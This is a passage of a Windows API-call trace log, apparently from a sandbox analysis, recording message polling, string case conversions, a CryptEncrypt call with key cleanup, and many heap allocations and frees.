wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.333] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.333] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.333] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.333] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.333] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.333] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24ca0d8*, pdwDataLen=0x8bef68*=0x267b, dwBufLen=0x2680 | out: pbData=0x24ca0d8*, pdwDataLen=0x8bef68*=0x2680) returned 1 [0254.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.334] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.334] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.334] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.334] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.334] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.334] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.334] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.334] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.334] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.334] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.335] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.335] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.335] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.335] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.335] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.335] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.335] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.335] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.335] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.336] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.336] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.336] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.337] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.337] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.337] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0254.337] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.337] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0254.338] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.338] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.338] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.338] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.338] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.338] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.338] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.338] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.338] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0254.338] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.338] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.338] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.338] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.339] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.339] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.339] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.339] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.339] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.339] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.339] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.339] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.339] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.339] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.339] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.339] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.339] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.339] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.339] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.340] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.340] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.340] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.340] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.340] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.340] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.340] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.340] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.340] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.340] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.340] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.340] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.340] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.340] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.340] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.340] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.341] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.341] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.341] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.341] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.341] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.341] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.341] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.341] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.341] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.341] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.341] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.341] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.341] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.341] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.341] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.342] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.342] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.342] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0254.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0254.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0254.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0254.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0254.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0254.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0254.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0254.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0254.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0254.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0254.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0254.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.344] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0254.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0254.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0254.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0254.344] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0254.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.344] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0254.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0254.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0254.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0254.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.345] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0254.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0254.345] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0254.345] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0254.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0254.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 